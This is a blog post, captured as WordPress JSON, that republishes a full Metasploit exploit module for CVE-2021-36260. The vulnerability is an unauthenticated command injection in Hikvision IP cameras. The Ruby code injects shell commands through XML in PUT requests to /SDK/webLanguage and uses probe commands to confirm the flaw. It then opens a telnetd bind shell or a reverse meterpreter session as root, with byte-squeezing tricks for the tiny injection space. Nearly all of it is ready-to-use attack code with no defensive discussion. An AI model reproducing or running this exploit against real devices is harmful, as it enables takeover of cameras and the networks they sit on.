{"id":21121,"date":"2022-02-28T20:18:23","date_gmt":"2022-02-28T17:18:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166167\/hikvision_cve_2021_36260_blind.rb.txt"},"modified":"2022-03-02T12:34:14","modified_gmt":"2022-03-02T09:04:14","slug":"hikvision-ip-camera-unauthenticated-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hikvision-ip-camera-unauthenticated-command-injection\/","title":{"rendered":"Hikvision IP Camera Unauthenticated Command Injection"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck
\ninclude Msf::Exploit::Remote::HttpClient
\ninclude Msf::Exploit::CmdStager
\ninclude Msf::Exploit::FileDropper<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Hikvision IP Camera Unauthenticated Command Injection’,
\n‘Description’ => %q{
\nThis module exploits an unauthenticated command injection in a variety of Hikvision IP
\ncameras (CVE-2021-36260). The module inserts a command into an XML payload used with an
\nHTTP PUT request sent to the `\/SDK\/webLanguage` endpoint, resulting in command execution
\nas the `root` user.<\/p>\n

This module specifically attempts to exploit the blind variant of the attack. The module
\nwas successfully tested against an HWI-B120-D\/W using firmware V5.5.101 build 200408. It
\nwas also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.
\nPlease see the Hikvision advisory for a full list of affected products.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘Watchful_IP’, # Vulnerability discovery and disclosure
\n‘bashis’, # Proof of concept
\n‘jbaines-r7’ # Metasploit module
\n],
\n‘References’ => [
\n[ ‘CVE’, ‘2021-36260’ ],
\n[ ‘URL’, ‘https:\/\/watchfulip.github.io\/2021\/09\/18\/Hikvision-IP-Camera-Unauthenticated-RCE.html’],
\n[ ‘URL’, ‘https:\/\/www.hikvision.com\/en\/support\/cybersecurity\/security-advisory\/security-notification-command-injection-vulnerability-in-some-hikvision-products\/security-notification-command-injection-vulnerability-in-some-hikvision-products\/’],
\n[ ‘URL’, ‘https:\/\/github.com\/mcw0\/PoC\/blob\/master\/CVE-2021-36260.py’]\n],
\n‘DisclosureDate’ => ‘2021-09-18’,
\n‘Platform’ => [‘unix’, ‘linux’],
\n‘Arch’ => [ARCH_CMD, ARCH_ARMLE],
\n‘Privileged’ => false,
\n‘Targets’ => [
\n[
\n‘Unix Command’,
\n{
\n‘Platform’ => ‘unix’,
\n‘Arch’ => ARCH_CMD,
\n‘Type’ => :unix_cmd,
\n‘DefaultOptions’ => {
\n# the target has very limited payload targets and a tight payload space.
\n# bind_busybox_telnetd might be *the only* one.
\n‘PAYLOAD’ => ‘cmd\/unix\/bind_busybox_telnetd’,
\n# saving four bytes of payload space by using ‘sh’ instead of ‘\/bin\/sh’
\n‘LOGIN_CMD’ => ‘sh’,
\n‘Space’ => 23
\n}
\n}
\n],
\n[
\n‘Linux Dropper’,
\n{
\n‘Platform’ => ‘linux’,
\n‘Arch’ => [ARCH_ARMLE],
\n‘Type’ => :linux_dropper,
\n‘CmdStagerFlavor’ => [ ‘printf’, ‘echo’ ],
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘linux\/armle\/meterpreter\/reverse_tcp’
\n}
\n}
\n]\n],
\n‘DefaultTarget’ => 0,
\n‘DefaultOptions’ => {
\n‘RPORT’ => 80,
\n‘SSL’ => false,
\n‘MeterpreterTryToFork’ => true
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n}
\n)
\n)
\nregister_options([
\nOptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’])
\n])
\nend<\/p>\n

# Check will test two things:
\n# 1. Is the endpoint a Hikvision camera?
\n# 2. Does the endpoint respond as expected to exploitation? This module is
\n# specifically testing for the blind variant of this attack so we key off
\n# of the returned HTTP status code. The developer’s test target responded
\n# to exploitation with a 500. Notes from bashis’ exploit indicates that
\n# they saw targets respond with 200 as well, so we’ll accept that also.
\ndef check
\n# Hikvision landing page redirects to ‘\/doc\/page\/login.asp’ via JavaScript:
\n# <script>
\n# window.location.href = “\/doc\/page\/login.asp?_” + (new Date()).getTime();
\n# <\/script>
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/’)
\n})
\nreturn CheckCode::Unknown(“Didn’t receive a response from the target.”) unless res
\nreturn CheckCode::Safe(‘The target did not respond with a 200 OK’) unless res.code == 200
\nreturn CheckCode::Safe(‘The target doesn\\’t appear to be a Hikvision device’) unless res.body.include?(‘\/doc\/page\/login.asp?_’)<\/p>\n

payload = ‘<xml><language>$(cat \/proc\/cpuinfo)<\/language><\/xml>’
\nres = send_request_cgi({
\n‘method’ => ‘PUT’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/SDK\/webLanguage’),
\n‘data’ => payload
\n})<\/p>\n

return CheckCode::Unknown(“Didn’t receive a response from the target.”) unless res
\nreturn CheckCode::Safe(‘The target did not respond with a 200 OK or 500 error’) unless (res.code == 200 || res.code == 500)<\/p>\n

# Some cameras are not vulnerable and still respond 500. We can weed them out by making
\n# the remote target sleep and use a low timeout. This might not be good for high latency targets
\n# or for people using Metasploit as a vulnerability scanner… but it’s better than flagging all
\n# 500 responses as vulnerable.
\npayload = ‘<xml><language>$(sleep 20)<\/language><\/xml>’
\nres = send_request_cgi({
\n‘method’ => ‘PUT’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/SDK\/webLanguage’),
\n‘data’ => payload
\n}, 10)<\/p>\n

return CheckCode::Appears(‘It appears the target executed the provided sleep command.’) unless res<\/p>\n

CheckCode::Safe(‘The target did not execute the provided sleep command.’)
\nend<\/p>\n

def execute_command(cmd, _opts = {})
\n# The injection space is very small. The entire snprintf is 0x1f bytes and the
\n# format string is:
\n#
\n# \/dav\/%s.tar.gz
\n#
\n# Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,
\n# snprintf will let us reclaim ‘.tar.gz’ so in reality, there are 26 bytes for
\n# our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes
\n# for payload. The ‘echo’ stager has a minium of 26 bytes but we obviously don’t
\n# have that much space. We can steal the extra space from the “random” file name
\n# and compress ‘ >> ‘ to ‘>>’. That will get us below 23. Squeezing the extra
\n# bytes will also allow printf stager to do more than 1 byte per exploitation.
\ncmd = cmd.gsub(%r{tmp\/[0-9a-zA-Z]+}, @fname)
\ncmd = cmd.gsub(\/ >\/, ‘>’)
\ncmd = cmd.gsub(\/> \/, ‘>’)<\/p>\n

payload = “<xml><language>$(#{cmd})<\/language><\/xml>”
\nres = send_request_cgi({
\n‘method’ => ‘PUT’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/SDK\/webLanguage’),
\n‘data’ => payload
\n})<\/p>\n

fail_with(Failure::Disconnected, ‘Connection failed’) unless res
\nfail_with(Failure::UnexpectedReply, “HTTP status code is not 200 or 500: #{res.code}”) unless (res.code == 200 || res.code == 500)
\nend<\/p>\n

def exploit
\nprint_status(“Executing #{target.name} for #{datastore[‘PAYLOAD’]}”)<\/p>\n

# generate a random value for the tmp file name. See execute_command for details
\n@fname = “tmp\/#{Rex::Text.rand_text_alpha(1)}”<\/p>\n

case target[‘Type’]\nwhen :unix_cmd
\nexecute_command(payload.encoded)
\nwhen :linux_dropper
\n# 26 is technically a lie. See `execute_command` for additional insight
\nexecute_cmdstager(linemax: 26)
\nend
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Hikvision IP Camera Unauthenticated Command Injection’, ‘Description’ => %q{ This module exploits an unauthenticated command injection in a variety …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21121","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21121","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21121"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21121\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21121"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}